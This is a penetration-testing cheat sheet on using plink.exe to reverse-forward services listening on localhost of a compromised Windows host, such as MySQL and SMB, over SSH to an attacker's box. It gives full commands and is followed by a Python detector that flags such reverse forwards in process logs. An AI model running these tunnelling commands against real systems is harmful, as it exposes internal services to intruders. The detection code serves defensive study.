Port Forwarding with PLINK

You can download the latest plink.exe binary from here: https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html


Individual Port Forwarding

  • Using plink.exe in SSH mode
  • A service on a compromised host is listening on 127.0.0.1
  • Open a port on attack box and forward traffic to remote port


Reverse Local Port to Remote Port

        Step 1. Establish SSH Tunnel from Remote

[Attack Box] <<=========[SSH]=========[+] [Remote]

127.0.0.1:[port]                      127.0.0.1:[port]
       [+]                                   ^
        |____________________________________|

    Step 2. Reverse Forward Attack Box Port to Remote
# Example Commands
# ----------------
# Open 127.0.0.1:33060 on Attack Box
# Tunnel to 127.0.0.1:3306 on target

# Password authentication
echo 'y' | .\plink.exe -ssh -l username -pw password -batch -N -R 127.0.0.1:33060:127.0.0.1:3306 attack-box-ip

# Private key authentication
echo 'y' | .\plink.exe -ssh -l username -i C:\Windows\Temp\key.pem -batch -N -R 127.0.0.1:33060:127.0.0.1:3306 attack-box-ip

# Multiple port forwards
echo 'y' | .\plink.exe -ssh -l username -i C:\Windows\Temp\key.pem -batch -N -R 127.0.0.1:33060:127.0.0.1:3306 -R 127.0.0.1:4445:127.0.0.1:445 attack-box-ip
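
On the defensive side, the `-R listen_addr:listen_port:dest_host:dest_port` arguments above are recorded verbatim in process-creation telemetry. The following is an added example (not part of the original page) that parses such command lines and summarizes each reverse forward; the function names, sample events, user names and addresses are constructed for illustration.

```python
import re
import shlex

# -R [listen_addr:]listen_port:dest_host:dest_port (IPv4 / hostname forms)
SPEC = re.compile(r"^(?:([^:]+):)?(\d{1,5}):([^:]+):(\d{1,5})$")
LOOPBACK = {"127.0.0.1", "localhost"}

def triage(cmdline):
    """Summarize SSH reverse forwards found in one process command line."""
    # posix=False keeps Windows backslashes in paths intact
    tokens = [t.strip("\"'") for t in shlex.split(cmdline, posix=False)]
    forwards = []
    for flag, spec in zip(tokens, tokens[1:]):
        m = SPEC.match(spec) if flag == "-R" else None
        if m:
            laddr, lport, dhost, dport = m.groups()
            forwards.append((laddr or "", int(lport), dhost, int(dport)))
    return {
        "forwards": forwards,
        # A service bound only to localhost on this host is being exposed
        "loopback_exposed": [f for f in forwards if f[2] in LOOPBACK],
        # No shell and no prompts: tunnel-only, unattended session
        "unattended": "-N" in tokens and "-batch" in tokens,
        # A credential is sitting in process-creation logs
        "password_on_cmdline": "-pw" in tokens,
        # False means the match came from the arguments, not the image name
        "plink_name": any(re.search(r"(^|[\\/])plink(\.exe)?$", t, re.I) for t in tokens),
    }

# Constructed sample events, as a process-creation log would record them
SAMPLES = [
    r"C:\Users\Public\plink.exe -ssh -l svc -pw hunter2 -batch -N -R 127.0.0.1:33060:127.0.0.1:3306 192.0.2.10",
    r"C:\Users\Public\p.exe -ssh -l svc -i C:\Windows\Temp\key.pem -batch -N -R 127.0.0.1:33060:127.0.0.1:3306 -R 127.0.0.1:4445:127.0.0.1:445 192.0.2.10",
    r"C:\Tools\plink.exe -ssh -l admin -batch backup.example.internal uptime",
]

def alerts(cmdlines):
    """Return (cmdline, summary) for every event that sets up a reverse forward."""
    return [(c, s) for c in cmdlines for s in [triage(c)] if s["forwards"]]

if __name__ == "__main__":
    for cmd, s in alerts(SAMPLES):
        name = "plink" if s["plink_name"] else "image not named plink"
        print(s["forwards"], name, sep=" | ")
```

Matching on the `-R` specification rather than the executable name keeps the check working when the image name in the event is not `plink.exe`.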